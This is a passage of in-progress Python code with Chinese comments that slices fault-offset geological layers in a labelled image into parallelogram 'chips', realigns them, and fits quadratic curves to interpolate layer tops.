#分成n段:四边形角落多出一块\n n=int(np.ceil((max(J)-min(J)+(max(I)-min(I))/k)/width))\n \n #chip总坐标列表\n total_chip=[]\n \n #总chip对象列表\n Chip=[]\n \n #大平行四边形四个顶点\n pos_A=[min(I),max(J)+(max(I)-min(I))/k]\n pos_B=[max(I),max(J)]\n \n for m in range(n): \n \n pos_C=[min(I),pos_A[1]-width]\n pos_D=[max(I),pos_A[1]-width]\n \n ABCD=[pos_A,pos_B,pos_C,pos_D]\n \n #在这四个点横纵坐标的最大范围内进行搜索\n I_quadrangle_point=[pos[0] for pos in ABCD]\n J_quadrangle_point=[pos[1] for pos in ABCD]\n \n I_max=max(I_quadrangle_point)\n I_min=min(I_quadrangle_point) \n J_max=max(J_quadrangle_point)\n J_min=min(J_quadrangle_point)\n \n# print(I_max,I_min,J_max,J_min)\n \n this_chip=o.chip()\n \n #初始化\n this_chip.k=k\n this_chip.part=m\n this_chip.tilt=tilt\n this_chip.tag=which_layer.tag\n this_chip.inclination=which_fault.inclination\n this_chip.content=[]\n \n #分段有利于提高计算速度\n n_special=np.ceil((max(I)-min(I))/k)\n \n #头尾(注意用段号m判断,而非总段数n)\n if 0<=m<n_special or n-n_special<=m:\n \n #判断是否在该四边形内部\n for i in range(I_min,I_max+1):\n \n #用斜率联系IJ\n I_offset=i-I_min\n J_offset=I_offset/k\n \n for j in range(int(np.round(J_min-J_offset)),\n int(np.round(J_max-J_offset)+1)):\n \n if [i,j] in which_layer.content:\n this_chip.content.append([i,j])\n \n #中间\n if n_special<=m<n-n_special: \n \n for i in range(I_min,I_max+1):\n \n #用斜率联系IJ\n I_offset=i-I_min\n J_offset=I_offset/k\n \n for j in range(int(np.round(J_min-J_offset)),\n int(np.round(J_max-J_offset)+1)):\n \n if img_tag[i,j]==this_chip.tag:\n this_chip.content.append([i,j])\n \n pos_A[1]-=width\n pos_B[1]-=width \n \n #7.11\n \n# print(len(this_chip.content))\n \n #集合成大列表\n total_chip+=this_chip.content\n Chip.append(this_chip)\n\n return total_chip,Chip\n\n#8.14\n#============================================================================== \n#更新Chip的id函数\ndef UpdateID(which_Chip):\n 
\n #初始化哟\n chips_id=1\n \n #逐层更新\n for this_chips in which_Chip.total_chips:\n \n this_chips.id=which_Chip.id+'-'+str(chips_id)\n chips_id+=1\n \n#8.12\n#============================================================================== \n"""\ncase1:如果top没有怎么办?连接在同一层的高度\n#chips的Init函数有问题,没法得到正确的top和others ok\ncase2:写一个完整的移动函数\ncase3:研究收缩和膨胀\n#再写一个layer填充函数\ncase4:给chip也命名?ok\ncase5:对补充出来的点进行平滑(美观) ok\ncase6:如何在top缺失的情况下将每一层桥接 ok\n#对chips和Chip都建立top和others的chip和chips \n""" \n#多个chip移动函数\ndef ChipMove(Chip,this_layer):\n \n total_chip=[]\n \n for this_chip in Chip:\n \n if this_chip.content!=[]:\n \n #对chip对象作移动处理\n I_chip=[pos[0] for pos in this_chip.content]\n \n #移动参照点\n I_layer=[pos[0] for pos in this_layer.edge]\n \n #移动距离\n I_offset_chip=min(I_layer)-min(I_chip)\n \n# print(len(this_chip.content))\n# print(I_offset_chip)\n \n #移动chip\n this_chip.Move(I_offset_chip,0)\n \n total_chip+=this_chip.content\n \n return total_chip,Chip \n \n#============================================================================== \n#写一个plate转化为chip对象的函数\n#which_plate是被转化的plate\n#which_fault是划分上下盘的fault\n#width是切片宽度\ndef Plate2Chip(which_plate,which_fault,img_tag,width,Chip_id):\n \n #获取fault倾角和斜率\n tilt,k=InitTilt(which_fault)\n \n# print(k)\n \n #分别取layer中的最大值和最小值\n I=[pos[0] for pos in which_plate.content]\n J=[pos[1] for pos in which_plate.content]\n \n #大偏移距(绝对值)\n J_total_offset=(max(I)-min(I))/abs(k) \n \n #分段有利于提高计算速度:特殊区段\n n_special=int(np.ceil(J_total_offset/width))\n \n #分成n段:四边形角落多出一块\n n=int(np.ceil((max(J)-min(J)+(J_total_offset))/width))\n \n# print(n)\n# print(n_special)\n# print(len(which_plate.content))\n \n #plate中的所有tag\n tags=[this_fraction.tag for this_fraction in which_plate.Tofractions()]\n total_tag=list(set(tags))\n \n# print(total_tag)\n \n #总chips对象列表\n total_chips=[]\n \n #创建一个表示平行四边形端点的列表\n that_Chip_node_quadrangle=[]\n \n #大平行四边形四个顶点\n# print(type(I))\n# print(type(J))\n\n #斜率分类讨论 \n if k>0: \n pos_A=[min(I),max(J)]\n pos_B=[max(I),max(J)+J_total_offset]\n \n if k<0:\n pos_A=[min(I),max(J)]\n pos_B=[max(I),max(J)-J_total_offset]\n \n# print(pos_A,pos_B)\n# print(len(which_plate.content))\n \n for m in range(n): \n \n #创建一个表示平行四边形端点的列表\n that_chips_node_quadrangle=[]\n \n pos_C=[min(I),pos_A[1]-width]\n pos_D=[max(I),pos_B[1]-width]\n \n ABCD=[pos_A,pos_B,pos_C,pos_D]\n \n #在这四个点横纵坐标的最大范围内进行搜索\n I_quadrangle_point=[pos[0] for pos in ABCD]\n J_quadrangle_point=[pos[1] for pos in ABCD]\n \n I_max=max(I_quadrangle_point)\n I_min=min(I_quadrangle_point) \n J_max=max(J_quadrangle_point)\n J_min=min(J_quadrangle_point)\n \n# print(I_max,I_min,J_max,J_min)\n \n this_chip=o.chip()\n \n #初始化\n this_chip.k=k\n this_chip.part=m\n this_chip.tilt=tilt\n this_chip.inclination=which_fault.inclination\n this_chip.content=[]\n \n #填充横向点\n if k>0: \n for JJ in range(int(np.ceil(J_total_offset+J_min)),int(np.ceil(J_max))): \n \n that_chips_node_quadrangle.append([I_max,JJ-int(np.ceil(J_total_offset))])\n that_chips_node_quadrangle.append([I_min,JJ])\n \n if k<0: \n for JJ in range(int(np.ceil(J_total_offset+J_min)),int(np.ceil(J_max))): \n \n that_chips_node_quadrangle.append([I_min,JJ])\n that_chips_node_quadrangle.append([I_max,JJ+int(np.ceil(J_total_offset))])\n \n# print(len(node_quadrangle))\n \n #收录which_plate中的点\n for i in range(I_min,I_max+1):\n \n #用斜率联系IJ\n I_offset=i-I_min\n J_offset=I_offset/k\n \n #收录端点\n start=int(np.round(J_max-J_offset-width))\n end=int(np.round(J_max-J_offset))\n \n that_chips_node_quadrangle.append([i,start])\n that_chips_node_quadrangle.append([i,end])\n 
\n for j in range(start,end):\n \n #根据tag值进行收录\n if img_tag[i,j] in total_tag: \n \n #增加判断条件\n if [i,j] in which_plate.content:\n \n this_chip.content.append([i,j])\n \n# print(len(this_chip.content)) \n \n #计算下一个平行四边形 \n pos_A[1]-=width\n pos_B[1]-=width \n \n #一个chip分成多个chip\n #这一个小四边形中的所有chip\n total_chip=[]\n \n #将this_chip拆成不同tag的各个部分\n for target_tag in total_tag:\n \n that_chip=o.chip()\n that_chip.tag=target_tag\n that_chip.k=k\n that_chip.part=m\n that_chip.tilt=tilt\n that_chip.inclination=which_fault.inclination\n that_chip.content=[]\n \n for pos in this_chip.content:\n \n #根据tag进行划分\n if img_tag[pos[0],pos[1]]==target_tag: \n \n that_chip.content.append(pos)\n \n# print(len(that_chip.content))\n \n #确保that_chip有点东西才添加它\n if that_chip.content!=[]:\n \n total_chip.append(that_chip)\n \n #建立新的chips对象\n that_chips=o.chips()\n \n #初始化\n that_chips.k=k\n that_chips.part=m\n that_chips.tilt=tilt\n that_chips.total_chip=total_chip \n that_chips.node_quadrangle=that_chips_node_quadrangle\n that_chips.Init() \n that_chips.need_to_advanced_regularization=False\n \n #特殊处理区段\n if m<n_special or m>=n-n_special:\n \n #得有点东西吧\n if that_chips.content!=[]: \n if that_chips.content!=None: \n \n that_chips.need_to_advanced_regularization=True\n \n# #检验一波\n# if that_chips.top!=None:\n# \n# print(that_chips.top.tag)\n \n #添加至chips列表\n total_chips.append(that_chips)\n that_Chip_node_quadrangle+=that_chips_node_quadrangle\n \n #建立新的Chip对象\n that_Chip=o.Chip()\n \n #初始化各属性\n that_Chip.id=Chip_id\n that_Chip.k=k\n that_Chip.tilt=tilt\n that_Chip.total_chips=total_chips\n that_Chip.plate=which_plate\n that_Chip.node_quadrangle=that_Chip_node_quadrangle\n that_Chip.Init()\n that_Chip.UpdateID()\n \n return that_Chip\n\n#Chips表示Chip对象列表\ndef ShowChips(Chips,img_rgb,rgb_dict,grid='off'):\n \n #显示找到的内容 \n background_rgb=img_rgb[0,0]\n img_temp=np.full(np.shape(img_rgb),background_rgb)\n \n #给像素点赋予rgb值\n for this_Chip in Chips:\n \n #Chip的颜色\n for this_chips in this_Chip.total_chips:\n \n for this_chip in this_chips.total_chip:\n \n for pos in this_chip.content:\n \n img_temp[int(pos[0]),int(pos[1])]=rgb_dict[this_chip.tag]\n \n #网格表示\n if grid=='on':\n \n #平行四边形边框\n for pos in this_Chip.node_quadrangle:\n \n img_temp[int(pos[0]),int(pos[1])]=np.array([0,0,0]) \n \n #在图中显示\n plt.figure()\n plt.imshow(img_temp)\n \n#8.11\n#============================================================================== \n#写一个Chip移动的函数\ndef ChipRegularization(which_Chip,adjustment=True):\n \n print('')\n \n# print(which_Chip.id)\n# print(which_Chip.top.tag)\n# print(which_Chip.total_tag) \n \n """第一轮正则化""" \n #第一步将平行四边形中的点都挪到node_quadrangle顶部 \n #切成chips一个个移动好吧\n for this_chips in which_Chip.total_chips:\n \n# print(len(this_chips.content))\n# print(len(this_chips.node_quadrangle))\n \n #确保平行四边形内有content\n if this_chips.content==None:\n continue\n \n if this_chips.content==[]:\n continue\n \n if this_chips.top.tag!=which_Chip.top.tag:\n continue\n \n if this_chips.need_to_advanced_regularization: \n continue\n \n# print(this_chips.top.tag)\n \n #横纵坐标\n I_this_chips_content=[pos[0] for pos in this_chips.content]\n I_this_chips_node_quadrangle=[pos[0] for pos in this_chips.node_quadrangle]\n \n #this_chips中的I最高点\n I_this_chips_top_content=min(I_this_chips_content)\n I_this_chips_top_node_quadrangle=min(I_this_chips_node_quadrangle)\n \n #i,j方向上的移动距离\n i_offset=I_this_chips_top_node_quadrangle-I_this_chips_top_content\n j_offset=int(np.floor(-i_offset/which_Chip.k))\n \n this_chips.Move(i_offset,j_offset)\n \n #正则化完成的标志\n 
this_chips.regularization=True\n \n# print('round 1')\n \n print('......') \n print('the end of round 1')\n\n #8.16\n \n """第二轮正则化""" \n\n print('')\n \n #通过need_to_advanced_regularization参数计算n_special\n id_list_to_calculate_n_special=[]\n \n for this_chips in which_Chip.total_chips:\n \n if this_chips.need_to_advanced_regularization:\n \n id_list_to_calculate_n_special.append(int(this_chips.id.split('-')[1]))\n\n# print(id_list_to_calculate_n_special) \n \n #计算n_special之路\n n_special=id_list_to_calculate_n_special[0]\n \n for k in range(len(id_list_to_calculate_n_special)-1): \n \n #判断是否连续(range减1,防止k+1越界)\n if id_list_to_calculate_n_special[k]==id_list_to_calculate_n_special[k+1]-1: \n n_special+=1\n \n #若这种连续中止了\n else:\n break\n \n# print(n_special)\n\n #8.17\n \n #虽然经过了初始化的处理,但是这几个节点还是需要计算的\n #左区间的起点和终点\n left_external=1\n left_internal=n_special\n \n #右区间的起点和终点\n right_external=id_list_to_calculate_n_special[-1]\n right_internal=id_list_to_calculate_n_special[-1]-n_special+1\n \n# print(left_start,left_end)\n# print(right_start,right_end)\n \n #分段函数,且从某一头取滑动点集\n #分组调试\n \n #左段 \n for this_id in range(left_internal,left_external-1,-1):\n \n SubRegularization(which_Chip,this_id,'right',adjustment)\n \n #右段 \n for this_id in range(right_internal,right_external+1,+1):\n \n SubRegularization(which_Chip,this_id,'left',adjustment) \n \n """有问题"""\n #中段\n for this_id in range(left_internal,right_internal):\n \n SubRegularization(which_Chip,this_id,'middle',adjustment)\n\n print('......') \n print('the end of round 2')\n\n#9.18\n#============================================================================== \n"""第一轮正则化""" \ndef PreRegularization(which_Chip,this_id):\n\n #第一步将平行四边形中的点都挪到node_quadrangle顶部 \n #切成chips一个个移动好吧\n this_chips_id=which_Chip.id+'-'+str(this_id)\n \n #找到这个chips\n this_chips=SearchByID([which_Chip],this_chips_id)\n \n# print(len(this_chips.content))\n# print(len(this_chips.node_quadrangle))\n \n #确保平行四边形内有content\n if this_chips.content==None: \n return\n \n if this_chips.content==[]:\n return\n \n if this_chips.top.tag!=which_Chip.top.tag:\n return\n# \n if this_chips.need_to_advanced_regularization: \n return\n \n# print(this_chips.top.tag)\n \n #横纵坐标\n I_this_chips_content=[pos[0] for pos in this_chips.content]\n I_this_chips_node_quadrangle=[pos[0] for pos in this_chips.node_quadrangle]\n \n #this_chips中的I最高点\n I_this_chips_top_content=min(I_this_chips_content)\n I_this_chips_top_node_quadrangle=min(I_this_chips_node_quadrangle)\n \n #i,j方向上的移动距离\n i_offset=I_this_chips_top_node_quadrangle-I_this_chips_top_content\n j_offset=int(np.floor(-i_offset/which_Chip.k))\n \n this_chips.Move(i_offset,j_offset)\n \n #正则化完成的标志\n this_chips.regularization=True\n \n# print('round 1')\n \n#9.2 \n\n#功能细化\n#mode表示左中右\n"""第二轮正则化""" \ndef SubRegularization(which_Chip,this_id,mode,adjustment):\n \n this_chips_id=which_Chip.id+'-'+str(this_id)\n \n #找到这个chips\n this_chips=SearchByID([which_Chip],this_chips_id)\n \n# print(this_chips.id)\n# print('round 2 '+mode) \n\n #确保平行四边形内有content\n if this_chips.content==None or this_chips.content==[]:\n return \n \n #如果不需要这一步,那就滚吧\n if not this_chips.need_to_advanced_regularization: \n return \n \n #调整端点\n if adjustment:\n \n #横纵坐标\n I_this_chips_content=[pos[0] for pos in this_chips.content]\n \n I_this_chips_node_quadrangle=[pos[0] for pos in this_chips.node_quadrangle]\n \n #this_chips中的I最高点\n I_this_chips_top_content=min(I_this_chips_content)\n I_this_chips_top_node_quadrangle=min(I_this_chips_node_quadrangle)\n \n #i,j方向上的移动距离\n 
i_offset=I_this_chips_top_node_quadrangle-I_this_chips_top_content\n j_offset=int(np.floor(-i_offset/which_Chip.k))\n \n this_chips.Move(i_offset,j_offset)\n \n #正则化完成的标志\n this_chips.regularization=True \n \n #从这里开始使用chipsNearby函数\n chips_nearby=chipsNearby(which_Chip,this_chips,3,mode)\n\n# print(len(chips_nearby))\n \n #8.31\n \n #chips_nearby所有的id列表\n chips_nearby_id=[this_near_chips.id for this_near_chips in chips_nearby]\n\n# print(chips_nearby_id)\n\n #寻觅chips_nearby的两个端点chips\n chips_nearby_id_int=[int(this_near_chips_id.split('-')[1]) for this_near_chips_id in chips_nearby_id]\n \n# print(chips_nearby_id_int)\n \n #chips_nearby的端点\n limit_chips_nearby=[]\n \n #用于计算limit的content内容\n content_limit_chips_nearby=[]\n \n #chips_nearby内部端点的id\n max_id_internal=which_Chip.id+'-'+str(max(chips_nearby_id_int))\n min_id_internal=which_Chip.id+'-'+str(min(chips_nearby_id_int))\n \n #chips_nearby外部端点的id\n max_id_external=which_Chip.id+'-'+str(max(chips_nearby_id_int)+1)\n min_id_external=which_Chip.id+'-'+str(min(chips_nearby_id_int)-1)\n \n id_limit_chips_nearby=[max_id_internal,min_id_internal,\n max_id_external,min_id_external]\n \n# print(id_limit_chips_nearby)\n \n #判断存在性\n for this_limit_id in id_limit_chips_nearby:\n \n if SearchByID([which_Chip],this_limit_id) is not None:\n \n #chips上船\n limit_chips_nearby.append(SearchByID([which_Chip],this_limit_id))\n \n #content上船\n if this_limit_id==max_id_external or this_limit_id==min_id_external:\n \n content_limit_chips_nearby+=limit_chips_nearby[-1].content\n \n #检验这几个id好吧\n# print([item.id for item in limit_chips_nearby])\n \n #9.1\n \n# print(len(content_limit_chips_nearby))\n \n #用于计算的threshold\n J_content_limit_chips_nearby=[pos[1] for pos in content_limit_chips_nearby] \n \n limit=[max(J_content_limit_chips_nearby),min(J_content_limit_chips_nearby)]\n \n# print(limit)\n \n #8.24\n \n #计算相邻chips的所有tag集合\n total_tag_chips_nearby=[]\n \n #计算各层的最高点\n for this_near_chips in chips_nearby:\n \n if len(this_near_chips.content)==0:\n continue\n \n total_tag_this_near_chips=[this_chip.tag for this_chip in this_near_chips.total_chip]\n \n #每个chips的tag集合\n total_tag_chips_nearby+=total_tag_this_near_chips\n \n# print('check 1')\n \n #如果啥都没有那也别玩了\n if total_tag_chips_nearby==[]:\n return \n \n# print('check 2')\n \n #将其取集合运算并转化为列表\n total_tag_chips_nearby=list(set(total_tag_chips_nearby))\n \n# print(total_tag_chips_nearby)\n \n #更正\n total_tag_this_chips=[]\n \n for this_chip in this_chips.total_chip:\n \n if this_chip.content==[] or this_chip.content==None:\n continue\n \n total_tag_this_chips.append(this_chip.tag)\n \n# print(total_tag_this_chips) \n \n \"\"\"权利的交接\"\"\"\n import copy\n total_tag_chips_nearby=copy.deepcopy(total_tag_this_chips)\n \n #total_tag对应的下家\n total_tag_chips_nearby_total_chip=[]\n \n #建立不同tag的dict组成的列表 \n for this_tag in total_tag_chips_nearby:\n \n #this_tag在nearby中所有的chip的集合\n this_tag_chips_nearby_total_chip=[]\n \n for this_near_chips in chips_nearby:\n \n this_chip_id=this_near_chips.id+'|'+str(this_tag)\n \n# print(this_chip_id)\n \n this_chip=SearchByID([which_Chip],this_chip_id) \n this_tag_chips_nearby_total_chip.append(this_chip)\n \n #建立索引:map表示映射关系 \n total_tag_chips_nearby_total_chip.append(this_tag_chips_nearby_total_chip)\n \n #建立map的集合\n total_map=dict(zip(total_tag_chips_nearby,total_tag_chips_nearby_total_chip))\n \n# print(total_map)\n# print(list(total_map.keys()))\n \n #8.25\n \n #用于存储所有的this_tag_top_chips_nearby的列表\n top_total_tag=[]\n \n for this_tag in list(total_map.keys()):\n \n 
#chips_nearby中每个tag的chip的最高点I的集合 \n I_top_this_tag_chips_nearby=[]\n \n #以及I_J的集合\n I_J_top_this_tag_chips_nearby=[]\n \n for this_chip in total_map[this_tag]:\n \n #确保非空\n if this_chip==None:\n continue \n \n if this_chip.content!=[] and this_chip.content!=None:\n\n I_this_chip=[pos[0] for pos in this_chip.content] \n J_this_chip=[pos[1] for pos in this_chip.content] \n \n #建立索引\n map_I_J_this_chip=dict(zip(I_this_chip,J_this_chip))\n \n I_top_this_chip=min(I_this_chip)\n J_top_this_chip=map_I_J_this_chip[I_top_this_chip]\n \n I_top_this_tag_chips_nearby.append(I_top_this_chip)\n I_J_top_this_tag_chips_nearby.append([I_top_this_chip,J_top_this_chip])\n \n #8.28\n \n# print(I_top_this_tag_chips_nearby)\n# print(I_J_top_this_tag_chips_nearby)\n \n #如果top_this_tag_chips_nearby为空:不可以让分母为0对吧\n if I_top_this_tag_chips_nearby==[] or I_J_top_this_tag_chips_nearby==[]:\n \n #要添加进列表的值\n top_this_tag=None\n \n #无异常就正常计算 \n #一般情况下使用插值\n else: \n top_this_tag=CalculateThisPoint(I_J_top_this_tag_chips_nearby,\n 'interpolation',\n this_chips,\n limit)\n #特殊情况下使用平均值\n if top_this_tag==None:\n \n top_this_tag=CalculateThisPoint(I_J_top_this_tag_chips_nearby,\n 'average')\n \n top_total_tag.append(top_this_tag)\n \n# print(top_total_tag) \n \n #建立this_tag和this_tag_top的索引\n map_total_tag_top=dict(zip(total_tag_chips_nearby,top_total_tag))\n \n# print(list(map_total_tag_top.values()))\n# print(map_total_tag_top)\n# print(this_chips.top.tag)\n \n #求新的top高度,忽略None值\n new_top_this_chips=min(v for v in map_total_tag_top.values() if v is not None)\n \n #计算咯\n #计算this_chips各个tag的chip相应的最高I值\n if this_chips.content!=[]:\n \n# print('good')\n \n I_this_chips=[pos[0] for pos in this_chips.content]\n now_top_this_chips=min(I_this_chips)\n \n# print(this_chips.id)\n# print(new_top_this_chips)\n# print(now_top_this_chips)\n \n #i,j方向上的移动距离\n i_offset=new_top_this_chips-now_top_this_chips\n j_offset=int(np.floor(-i_offset/which_Chip.k))\n \n# print(i_offset,j_offset)\n \n this_chips.Move(i_offset,j_offset)\n \n I_this_chips=[pos[0] for pos in this_chips.content]\n now_top_this_chips=min(I_this_chips)\n \n# print(now_top_this_chips)\n \n #正则化完成的标志\n this_chips.regularization=True \n \n#8.16\n#============================================================================== \n#搜索相邻10个参数的函数\n#which_Chip表示这件事发生在某个Chip中\n#which_chips表示被搜索的chips\n#amount表示参与计算的点的数量\n#side表示该chips位于整体chips的什么位置\ndef chipsNearby(which_Chip,which_chips,amount,side):\n \n #计算which_Chip里chips的id上下限\n total_chips_id=[int(this_chips.id.split('-')[1]) for this_chips in which_Chip.total_chips]\n \n #上下限id\n chips_id_max=which_Chip.id+'-'+str(max(total_chips_id))\n chips_id_min=which_Chip.id+'-'+str(min(total_chips_id))\n \n# print(chips_id_max,chips_id_min)\n \n #最终结果得到集合\n chips_nearby=[]\n \n #处理顶部异常的chips\n if which_chips.need_to_advanced_regularization:\n \n start_chips_id=int(which_chips.id.split('-')[1])\n \n #初始化左右id,用split函数分别取id的前后半段\n left_id=which_chips.id.split('-')[0]+'-'+str(start_chips_id)\n right_id=which_chips.id.split('-')[0]+'-'+str(start_chips_id)\n \n #count大于amount时停止\n count=0\n \n #左端的chips们的相应参数由其右端的中间参数集合得到\n if side=='left':\n \n while count<amount:\n \n left_id=which_Chip.id+'-'+str(int(left_id.split('-')[1])-1)\n \n #到顶了就结束\n if left_id==chips_id_min:\n break\n \n #前提是他们存在呢\n if SearchByID([which_Chip],left_id) is not None:\n \n count+=1\n chips_nearby.append(SearchByID([which_Chip],left_id))\n \n# print('left')\n \n #右端的chips们的相应参数由其左端的中间参数集合得到\n if side=='right':\n while count<amount:\n \n right_id=which_Chip.id+'-'+str(int(right_id.split('-')[1])+1)\n \n #到头了就结束\n if 
right_id==chips_id_max:\n break\n \n #判断存在这样一个事物\n if SearchByID([which_Chip],right_id) is not None:\n \n count+=1\n chips_nearby.append(SearchByID([which_Chip],right_id))\n \n# print('right')\n \n #两头增长,数量为amount时停止,取的平均\n if side=='middle':\n while count<amount:\n \n #左右开弓\n left_id=which_Chip.id+'-'+str(int(left_id.split('-')[1])-1)\n right_id=which_Chip.id+'-'+str(int(right_id.split('-')[1])+1)\n \n #到顶了就结束\n if left_id==chips_id_min or right_id==chips_id_max:\n break\n \n #前提是他们存在呢\n if SearchByID([which_Chip],left_id) is not None:\n \n count+=1\n chips_nearby.append(SearchByID([which_Chip],left_id))\n \n# print('middle-left')\n \n #判断存在这样一个事物\n if SearchByID([which_Chip],right_id) is not None:\n \n count+=1\n chips_nearby.append(SearchByID([which_Chip],right_id))\n \n# print('middle-right')\n \n return chips_nearby\n \n#8.15\n#============================================================================== \n#写一个通过id搜索chips的函数\n#Chips为本场比赛的Chip集合\ndef SearchByID(Chips,ID):\n \n #可搜索Chip chips chip\n #搜索Chip\n for this_Chip in Chips:\n if this_Chip.id==ID:\n return this_Chip\n \n #搜索chips \n if '-' in ID and '|' not in ID:\n for this_Chip in Chips:\n for this_chips in this_Chip.total_chips:\n if this_chips.id==ID:\n return this_chips\n \n #搜索chip\n if '-' in ID and '|' in ID:\n for this_Chip in Chips:\n for this_chips in this_Chip.total_chips:\n for this_chip in this_chips.total_chip:\n if this_chip.id==ID:\n return this_chip\n\n#8.25\n#============================================================================== \n#计算列表平均值的函数\ndef GetAverage(which_data):\n sum_data=0\n \n for item in which_data:\n sum_data+=item\n \n return sum_data/len(which_data)\n \n#计算列表中位数的函数\ndef GetMedian(which_data):\n \n data=sorted(which_data)\n size=len(which_data)\n \n #判断列表长度为偶数\n if size%2==0: \n return (data[size//2]+data[size//2-1])/2\n \n #判断列表长度为奇数 \n if size%2==1: \n return data[(size-1)//2] \n \n#计算某点某特征值的函数\n#which_data表示需要计算的集合\n#mode表示计算的模式:average表示平均值,median表示中位数,interpolation表示插值 \n#which_chips表示需要计算高度的那个chips\n#threshold表示用于计算的自变量的取值范围 \ndef CalculateThisPoint(which_data,mode,which_chips=None,threshold=None):\n \n #还原成相应的I坐标\n I_which_data=[pos[0] for pos in which_data]\n J_which_data=[pos[1] for pos in which_data]\n \n #平均值\n if mode=='average':\n return int(np.round(GetAverage(I_which_data)))\n \n #中位数\n if mode=='median':\n return int(np.round(GetMedian(I_which_data)))\n \n \"\"\"插值比较特殊:可能需要提供坐标???\"\"\"\n #插值\n if mode=='interpolation':\n \n# print(threshold)\n# print('......')\n# \n# print(which_data) \n# print('......')\n#\n# print(which_chips.content)\n# print('......')\n# \n# print(len(which_chips.content))\n# print('......')\n# \n# print(GetInterpolation(which_data,threshold))\n# print('......')\n# \n# print(len(GetInterpolation(which_data,threshold))) \n# print('......')\n \n result_interpolation=GetInterpolation(which_data,threshold)\n \n result_final=CrossDataAB(which_chips.content,result_interpolation)\n \n# print(result_final)\n# print('......')\n \n #9.2\n \n \"\"\"若结果不止一个,或为0,如何处理??\"\"\" \n #结果为空\n if len(result_final)==0:\n \n #neighbor大法好 \n #[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j],[i-1,j-1]\n neighbordict=[(i,j) for i in [-1,0,1] for j in [-1,0,1]]\n \n #遍历插值结果\n for pos in result_interpolation:\n \n #逆时针遍历邻域内的点\n for item in neighbordict:\n \n #遍历新的坐标 \n new_pos=[pos[0]+item[0],pos[1]+item[1]]\n \n if new_pos in which_chips.content: \n \n if new_pos not in result_final:\n \n result_final.append(new_pos) \n \n #结果不止一个\n if len(result_final)>1:\n \n 
#计算which_data的中心\n center_which_data=[np.mean(I_which_data),np.mean(J_which_data)]\n \n #中心到各个result的距离\n distance_center2result=[Distance(this_pos,center_which_data) for this_pos in result_final]\n \n #距离和result建立键值对\n map_distance_center2result=dict(zip(distance_center2result,result_final))\n \n #返回距离最小的哥\n result_final=[map_distance_center2result[min(distance_center2result)]]\n \n #结果就一个,返回其I坐标 \n if len(result_final)==1:\n \n# print(result_final[0])\n \n return result_final[0][0]\n \n else:\n return None\n\n#8.29\n \n\"\"\"以下部分为计算插值系列函数\"\"\"\n#二次函数的标准形式\ndef func(params,x):\n \n a,b,c=params\n \n return a*x**2+b*x+c\n\n#误差函数,即拟合曲线所求的值与实际值的差\ndef error(params,x,y):\n return func(params,x)-y\n\n#对参数求解\ndef slovePara(X,Y):\n \n #p0里放的是a、b、c的初始值,这个值可以随意指定。\n #往后随着迭代次数增加,a、b、c将会不断变化,使得error函数的值越来越小。\n p0=[10,10,10]\n \n from scipy.optimize import leastsq\n #leastsq的返回值是一个tuple\n #它里面有两个元素,第一个元素是a、b、c的求解结果,第二个则为cost function的大小!\n Para=leastsq(error,p0,args=(X,Y))\n \n return Para\n \n#which_data表示参与的坐标\n#threshold是拟合出的曲线的自变量上下限列表\ndef GetInterpolation(which_data,threshold,show=False):\n \n #转化为一维列表\n I_which_data=[pos[0] for pos in which_data]\n J_which_data=[pos[1] for pos in which_data]\n \n #z幻化为np.array对象,便于处理:X为自变量,Y为因变量 \n X=np.array(J_which_data)\n Y=np.array(I_which_data)\n\n Para=slovePara(X,Y)\n a,b,c=Para[0]\n \n# print(a,b,c) \n \n #在threshold范围内直接画100个连续点\n amount=max(threshold)-min(threshold)+1\n x=np.linspace(min(threshold),max(threshold),amount) \n\n# print(amount)\n \n #函数式\n y=a*x*x+b*x+c \n \n #是否输出图形\n if show:\n \n #保留两位小数\n a=float('%0.2f'%a)\n b=float('%0.2f'%b)\n c=float('%0.2f'%c)\n \n print(\"a=\",a,\"b=\",b,\"c=\",c)\n print(\"cost:\" + str(Para[1]))\n print(\"求解的曲线是:\")\n print(\"y=\"+str(round(a,2))+\"x*x+\"+str(round(b,2))+\"x+\"+str(c))\n \n plt.figure(figsize=(8,6))\n plt.scatter(X,Y,color=\"green\",label=\"sample data\",linewidth=2)\n \n #画拟合直线\n plt.plot(x,y,color=\"red\",label=\"solution line\",linewidth=2)\n \n #绘制图例\n plt.legend() \n plt.show()\n \n #输出x和y组成的坐标集合\n return CombineXY(y,x)\n \n\"\"\"拿抛物线和chip作一个交集的运算\"\"\"\n\n#8.30 \n\n#定义一个组合对应位置x和y坐标的函数\n#to_int表示是否取整,默认为True\ndef CombineXY(x,y,to_int=True):\n \n #转为列表\n list(x),list(y)\n \n #输出结果的列表\n that_data=[]\n \n for k in range(len(x)):\n \n #如果取整\n if to_int: \n that_x=int(np.round(x[k]))\n that_y=int(np.round(y[k]))\n \n else:\n that_x=x[k]\n that_y=y[k]\n \n that_data.append([that_x,that_y])\n \n return that_data\n\n#定义过(x0,y0),斜率为k的像素点集合\n#threshold是自变量取值范围[x_min,x_max]\ndef GenerateLineList(x0,y0,k,threshold):\n \n #自变量x的取值范围为\n x=np.linspace(min(threshold),max(threshold),max(threshold)-min(threshold)+1) \n y=(x-x0)*k+y0\n \n return CombineXY(x,y)\n\n#计算集合data_A和data_B交集\ndef CrossDataAB(data_A,data_B):\n \n #结果列表\n data_cross=[]\n \n for pos in data_A:\n if pos in data_B:\n data_cross.append(pos)\n \n return data_cross\n\n#计算chips和曲线的交集坐标\n#parameters表示多项式的系数集合\n\"\"\"其实不用专门写这一个函数\"\"\"\ndef Convey(chips,data_curve):\n \n #chips的content和data_curve的交集\n return CombineXY(chips.content,data_curve) \n \n#============================================================================== \n#更新Chip的top\ndef ChipUpdateTop(which_Chip):\n\n# print(which_Chip.total_tag)\n \n #top不可以是fault\n if -1 in which_Chip.total_tag:\n which_Chip.total_tag.remove(-1)\n \n #所有tag的高度\n total_tag_top=[]\n \n #所有tag的fraction\n total_tag_fraction=[]\n \n for this_tag in which_Chip.total_tag:\n \n this_tag_fraction=o.fraction()\n this_tag_content=[]\n \n for this_chips in which_Chip.total_chips:\n\n for this_chip in 
